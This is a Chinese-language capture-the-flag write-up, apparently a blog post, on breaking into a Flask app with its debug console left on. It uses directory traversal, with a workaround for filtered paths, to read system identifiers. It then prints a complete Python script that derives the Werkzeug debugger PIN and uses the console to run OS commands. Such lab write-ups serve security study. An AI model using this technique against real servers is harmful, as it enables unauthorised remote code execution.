审题
打开环境,根据提示访问页面,看到过滤掉了cgroup、flag、self
![](https://img-blog.csdnimg.cn/img_convert/9e4af016d7d14118ab72afaeab243f43.png)
让页面报错,发现console是开启的
![](https://img-blog.csdnimg.cn/img_convert/9508b2452bfb48c4abae8f9e7c2f190f.png)
然后就是需要一个PIN码
![](https://img-blog.csdnimg.cn/img_convert/286c0eac63184abaab66d262caac0a77.png)
get请求可以进行目录穿越,接下来就是要根据文件得到的内容去生成PIN码
username(/etc/passwd)
app.py路径(页面报错获得)
mac address(/sys/class/net/eth0/address或/sys/class/net/ens33/address)
machine-id(/etc/machine-id)
cpuid(/proc/self/cgroup)这里题目ban了self和cgroup,可以换(/proc/1/cpuset)具体原因可以参考这篇文章->在这里
username获取
![](https://img-blog.csdnimg.cn/img_convert/58da8a8f9e194152a65e3e860a4d895e.png)
得到app
app.py路径获取
![](https://img-blog.csdnimg.cn/img_convert/1ef184ab4eaf4e1185586e2ba6cfd6cb.png)
得到/usr/local/lib/python3.8/site-packages/flask/app.py
mac address获取
![](https://img-blog.csdnimg.cn/img_convert/eb8a589e091b48b486c266a01b225030.png)
这里要注意需要对address进行处理
addr = '02:42:ac:02:0b:64'
print(int(addr.replace(':', ''), 16))
得到2485376912228
machine-id获取
![](https://img-blog.csdnimg.cn/img_convert/23f69ac0a969401c953badac59c27fb9.png)
得到7265fe765262551a676151a24c02b7b6
cpuid获取
![](https://img-blog.csdnimg.cn/img_convert/9036d63c574041d19ab42db7172dcb5b.png)
得到cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
machine-id拼接cpuid
7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114
跑脚本得到PIN码,脚本可以网上随便找,我用的是
import hashlib
from itertools import chain
probably_public_bits = [
'app',# username
'flask.app',# modname
'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
'/usr/local/lib/python3.8/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]
private_bits = [
'2485376912228',# str(uuid.getnode()), /sys/class/net/eth0/address
'7265fe765262551a676151a24c02b7b6cd4b392caf6a02636f16f97b830f3b5564d27d7a2985edeedca7582fa6d23114'# get_machine_id(), /etc/machine-id
]
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
if not bit:
continue
if isinstance(bit, str):
bit = bit.encode("utf-8")
h.update(bit)
h.update(b"cookiesalt")
cookie_name = f"__wzd{h.hexdigest()[:20]}"
# If we need to generate a pin we salt it a bit more so that we don't
# end up with the same value and generate out 9 digits
num = None
if num is None:
h.update(b"pinsalt")
num = f"{int(h.hexdigest(), 16):09d}"[:9]
# Format the pincode in groups of digits for easier remembering if
# we don't have a result yet.
rv = None
if rv is None:
for group_size in 5, 4, 3:
if len(num) % group_size == 0:
rv = "-".join(
num[x : x + group_size].rjust(group_size, "0")
for x in range(0, len(num), group_size)
)
break
else:
rv = num
print(rv)
生成PIN:155-314-265
进入console
导入os,执行系统命令,这里傻了一下,一开始没注意到后面的+号。flag文件怎么都读不出东西……
![](https://img-blog.csdnimg.cn/img_convert/d2e01cf119d143898d2c7baf9e605f90.png)
真的flag在readflag文件里……
![](https://img-blog.csdnimg.cn/img_convert/22546ec8ad134743914bf81388120596.png)
![](https://img-blog.csdnimg.cn/img_convert/01815e1ad292490a8a4d22a387a9d28a.png)
得到flag
HSCSEC{45035c7e-1eb5-452f-8356-2fc000e3d2b4}